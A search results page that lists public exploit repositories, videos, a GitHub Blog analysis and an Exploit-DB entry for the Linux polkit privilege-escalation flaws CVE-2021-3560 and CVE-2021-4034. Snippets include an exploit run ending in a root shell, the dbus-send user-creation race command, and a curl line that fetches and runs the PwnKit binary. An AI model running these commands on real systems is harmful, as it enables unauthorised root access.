GitHub
github.com › Almorabea › Polkit-exploit › blob › main › CVE-2021-3560.py
Polkit-exploit/CVE-2021-3560.py at main · Almorabea/Polkit-exploit
Privilege escalation with polkit - CVE-2021-3560.
Author Almorabea
GitHub
github.com › secnigma › CVE-2021-3560-Polkit-Privilege-Esclation
GitHub - secnigma/CVE-2021-3560-Polkit-Privilege-Esclation · GitHub
An attacker can exploit this vulnerability by triggering polkit by sending a dbus message, but closing the request abruptly, while polkit is processing the request.
Starred by 123 users
Forked by 52 users
Languages Shell
Videos
Linux Privilege Escalation Vulnerability in Polkit’s pkexec
03:27
#polkit privilege escalation 2022 | pwnkit #exploit - YouTube
03:40
CVE-2021-4034 Polkit Vulnerability Demonstration - YouTube
08:15
🐧 Linux Permissions + Privileges + Local Exploit Demo - YouTube
23:38
Polkit exploit | CVE-2021-3560 | Linux Privilege Escalation ...
GitHub
github.com › carlosevieira › polkit
GitHub - carlosevieira/polkit · GitHub
This is static binary file to exploit the polkit vulnerability (CVE-2021-4034) Just copy and paste on target this command and get root shell.
Forked by 3 users
Languages Shell
GitHub
github.com › Almorabea › Polkit-exploit
GitHub - Almorabea/Polkit-exploit: Privilege escalation with polkit - CVE-2021-3560 · GitHub
test@ubuntu:~/Desktop$ python3 CVE-2021-3560.py ************** Exploit: Privilege escalation with polkit - CVE-2021-3560 Exploit code written by Ahmad Almorabea @almorabea Original Exploit Author: Kevin Backhouse For more details check this: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/#history [+]Starting the Exploit [+] User Created with the name of ahmed [+] Timed out at: 0.008446890996407191 [+] Timed out at: 0.008934336684707084 [+] Exploit Completed, your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root bash: cannot set terminal process group (46983): Inappropriate ioctl for device bash: no job control in this shell root@ubuntu:/home/test/Desktop# id uid=0(root) gid=0(root) groups=0(root) root@ubuntu:/home/test/Desktop# whoami root root@ubuntu:/home/test/Desktop#
Starred by 125 users
Forked by 52 users
Languages Python
GitHub
github.blog › home › security › vulnerability research › privilege escalation with polkit: how to get root on linux with a seven-year-old bug
Privilege escalation with polkit: How to get root on Linux with a seven-year-old bug - The GitHub Blog
January 26, 2022 - That’s why it usually takes a few tries for the exploit to succeed. I’d guess it’s also the reason why the bug wasn’t previously discovered. If you could trigger the vulnerability by killing the dbus-send command immediately, then I expect it would have been discovered a long time ago, because that’s a much more obvious thing to test for. The function which asks dbus-daemon for the UID of the requesting connection is named polkit_system_bus_name_get_creds_sync:
GitHub
github.com › aancw › polkit-auto-exploit
GitHub - aancw/polkit-auto-exploit: Automatic Explotation PoC for Polkit CVE-2021-3560 · GitHub
ubuntu@ubuntu2004:~/polkit-auto-exploit$ ./polkit-auto-exploit -u adminhs -p admin1 -f admin [===] Auto Exploitation PoC for Polkit CVE-2021-3560 by Petruknisme [===] [+] Current User: ubuntu [+] Variable for Polkit Configuration [*] Username : adminhs [*] Password : admin1 [*] Fullname : admin [+] Sending create user command to determine time execution [*] Execution time: 0.018076ms [+] Time to killing dbus-send setting to 0.009038ms dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:adminhs string:'admin' int32:1 & sleep 0.009038s ; kill $! ..................
Author aancw
GitHub
github.com › UNICORDev › exploit-CVE-2021-3560
GitHub - UNICORDev/exploit-CVE-2021-3560: Exploit for CVE-2021-3560 (Polkit) - Local Privilege Escalation · GitHub
Starred by 12 users
Forked by 3 users
Languages Python 95.4% | Dockerfile 4.6%
GitHub
github.com › Kirill89 › CVE-2021-4034
GitHub - Kirill89/CVE-2021-4034: pkexec (Polkit) exploit of Privilege Escalation vulnerability CVE-2021-4034 · GitHub
Starred by 6 users
Forked by 2 users
Languages Shell 49.3% | Dockerfile 31.2% | C 19.5%
GitHub
github.com › LucasPDiniz › CVE-2021-3560
GitHub - LucasPDiniz/CVE-2021-3560: Exploitation of the CVE-2021-3560 polkit vulnerability · GitHub
In short, by destroying the message ID before the dbus-daemon has a chance to give polkit the correct ID, we exploit the poor error-handling in polkit to trick the utility into thinking that the request was made by the all-powerful root user.
Author LucasPDiniz
GitHub
github.com › v4resk › red-book › blob › main › redteam › privilege-escalation › linux › polkit-exploits › pwnkit.md
red-book/redteam/privilege-escalation/linux/polkit-exploits/pwnkit.md at main · v4resk/red-book
polkit-0.115-13.al8.1 We can use this exploit made by ly4k. It should work out of the box on vulnerable Linux distributions based on Ubuntu, Debian, Fedora, and CentOS. #Run the exploit curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit chmod +x ./PwnKit ./PwnKit # interactive shell ./PwnKit 'id' # single command # Or you may want to compile it by yourself gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC
Author v4resk
GitHub
github.com › tufanturhan › polkit-privesc-linux
GitHub - tufanturhan/polkit-privesc-linux · GitHub
It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission). You can easily exploit the system using a single script, downloadable and executable with this command:
Author tufanturhan
GitHub
github.com › berdav › CVE-2021-4034
GitHub - berdav/CVE-2021-4034: CVE-2021-4034 1day · GitHub
It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission). You can easily exploit the system using a single script, downloadable and executable with this command:
Starred by 2K users
Forked by 508 users
Languages C 74.7% | Makefile 19.6% | Shell 5.7%
GitHub
github.com › aancw › polkit-auto-exploit › blob › main › README.md
polkit-auto-exploit/README.md at main · aancw/polkit-auto-exploit
Author aancw
GitHub
github.com › n3onhacks › CVE-2021-3560
GitHub - NeonWhiteRabbit/CVE-2021-3560: Polkit Exploit (CVE-2021-3560), no download capabilty? Copy and paste it!
February 2, 2022 - >git clone https://github.com/n3onhacks/CVE-2021-3560.git >chmod -R CVE-2021-3560 >cd CVE-2021-3560 >./polkit.sh
Author NeonWhiteRabbit
Exploit-DB
exploit-db.com › exploits › 50689
PolicyKit-1 0.105-31 - Privilege Escalation - Linux local Exploit
January 27, 2022 - # Exploit Title: PolicyKit-1 0.105-31 - Privilege Escalation # Exploit Author: Lance Biggerstaff # Original Author: ryaagard (https://github.com/ryaagard) # Date: 27-01-2022 # Github Repo: https://github.com/ryaagard/CVE-2021-4034 # References: ...
GitHub
github.com › topics › cve-2021-4034
Build software better, together
local-privilege-escalation polkit pkexec polkit-agent cve-2021-4034 polkit-exploit
GitHub
github.com › WinMin › CVE-2021-3560
GitHub - winmin/CVE-2021-3560: PolicyKit CVE-2021-3560 Exploitation (Authentication Agent) · GitHub
dev@server:/tmp/CVE-2021-3560$ make dev@server:/tmp/CVE-2021-3560$ ./exploit pid:264181 - [ polkit CVE-2021-3560 exploit ] - RicterZ @ 360 Noah Lab, C writed by Swing @ chaitin pid:264181 - [*] main process running ... pid:264183 - [*] starting polkit authentication agent ...
Starred by 25 users
Forked by 5 users
Languages C 96.8% | Makefile 3.2%
GitHub
github.com › arthepsy › CVE-2021-4034
GitHub - arthepsy/CVE-2021-4034: PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034)
Starred by 1.2K users
Forked by 318 users
Languages C